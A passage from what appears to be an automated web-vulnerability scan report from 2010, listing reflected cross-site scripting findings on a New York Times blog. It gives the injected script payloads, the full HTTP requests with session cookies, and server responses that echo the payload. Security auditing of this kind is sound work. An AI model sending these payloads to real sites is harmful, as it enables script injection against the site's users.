ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:23:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:23:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43844
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires/feed2c78f\"><script>alert(1)</script>40440eb34cb&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.199. http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/home-fires/page/2/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2385"><script>alert(1)</script>2952f429861 was submitted in the REST URL parameter 3. This input was echoed as f2385\"><script>alert(1)</script>2952f429861 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/home-fires/pagef2385"><script>alert(1)</script>2952f429861/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:27:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:27:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3. |